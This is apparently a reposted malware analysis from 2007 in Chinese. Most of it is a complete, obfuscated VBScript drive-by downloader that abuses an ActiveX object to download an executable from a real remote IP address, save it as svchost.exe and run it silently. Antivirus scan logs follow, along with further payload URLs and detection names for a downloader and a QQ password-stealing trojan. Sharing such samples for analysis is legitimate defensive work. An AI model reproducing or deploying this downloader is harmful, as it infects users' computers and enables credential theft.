转一个分析报告
<SCRIPT language=VBScript>
on error resume next
fuckie = "http://210.51.184.238:8080/images/server.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, fuckie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>
<script language="javascript" src="http://count20.51yes.com/click.aspx?id=208338993&logo=12"></script>
##### Configuration
# Heuristic level : 4
# Archives scanning with no limit
# Embedded files scanning enabled
# Dialers detection enabled
# Spyware detection enabled
#
##### Statistic
# Objects scanned :
# f:\server.exe
# Files scanned : 1
# Archives scanned : 0 Files in archives : 0
# Embedded files scanned : 0
# Number of infected files : 1 Infected files left : 1
# Cleaned : 0
# Renamed : 0
# Deleted : 0
# Quarantined : 0
# Scanning time : 00:00:08
#
##### Notice
#
2;1;0;1;2007-03-24 16:04:23;Warning;ArcaScan;;102;f:\server.exe;Downloader.Small.Die;NO ACTION;;;
/src = "http://210.51.184.238:8080/images/1.exe"
/src = "http://210.51.184.238:8080/images/2.exe"
/src = "http://210.51.184.238:8080/images/3.exe"
/src = "http://210.51.184.238:8080/images/4.exe"
f:\3.exe
Znaleziono:
Trojan.Psw.Qqrob.Km |